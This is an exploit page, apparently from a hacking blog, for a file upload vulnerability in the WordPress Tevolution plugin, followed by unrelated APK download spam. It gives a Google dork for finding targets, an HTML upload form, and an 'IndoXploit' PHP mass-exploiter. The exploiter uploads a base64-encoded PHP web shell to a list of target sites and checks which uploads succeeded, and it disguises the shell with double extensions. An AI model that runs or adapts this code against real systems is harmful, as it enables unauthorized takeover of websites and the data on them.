WordPress Tevolution Plugin File Upload Vulnerability

In XIAOMI 65 views

#- Title: Wordpress Tevolution Plugin File Upload Vulnerability
#- Author: unknown
#- Date: 2016
#- Developer : templatic
#- Link Download : templatic. com/wordpress-plugins/tevolution
#- Google Dork: inurl:”/plugins/Tevolution/”
#- Fixed in Version : –
#- Tested on : windows

=======================================================
— Proof Of Concept —

Description : 

The Tevolution WordPress plugin enables advanced functionality in our themes. Some of the features it enables include custom post types, monetization options, custom fields… Cool thing about Tevolution is the fact it’s modular, meaning you can turn off the features you do not need. 

Vulnerability : site/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

When Vulnerable :Maybe “Blank” 
— Method —
CSRF

<form
action="http://3xploi7.blogspot.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

Tevolution Auto Exploit Coded by IndoXploit

<html>
<center>
<form method="post" enctype="multipart/form-data">
Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php.xxxjpg' required><br>
Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
<input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
</form>
<?php
// IndoXploit
set_time_limit(0);
error_reporting(0);

function buffer() {
ob_flush();
flush();
}
function curl($url, $payload) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
$file = htmlspecialchars($_POST['filename']);
$site = explode("rn", $_POST['url']);
$do = $_POST['exp'];
$uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if($do) {
$y = date("Y");
$m = date("m");
$idx_dir = mkdir("indoxploit_tools", 0755);
$shell = "indoxploit_tools/".$file;
$fopen = fopen($shell, "w");
fwrite($fopen, $uploader);
fclose($fopen);
foreach($site as $url) {
$target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
$cek_shell = "$url/wp-content/uploads/$y/$m/$file";
$data = array(
"Filedata" => "@$shell"
);
$curl = curl($target, $data);
if($curl) {
$cek = file_get_contents($cek_shell);
if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
}
}
buffer();
}
}
?>
Format Shell > php, php4, php5, php.xxxjpg, php.asp Etc.

If Succesfully  [3xploi7.php4]
Need Shell Path ? Click Here 

Tags: #Auto3xploi7ed #CSRF #File Upload #Wordpress

Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk
Download Pes 2018 Android Release APK terbaru
Download Pes 2018 Android Release APK terbaru
Download FTS Mod PES 2018 APK +
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga APK v0.14.1 Terbaru– Rumah Android
Must read×

Top
error: Content is protected !!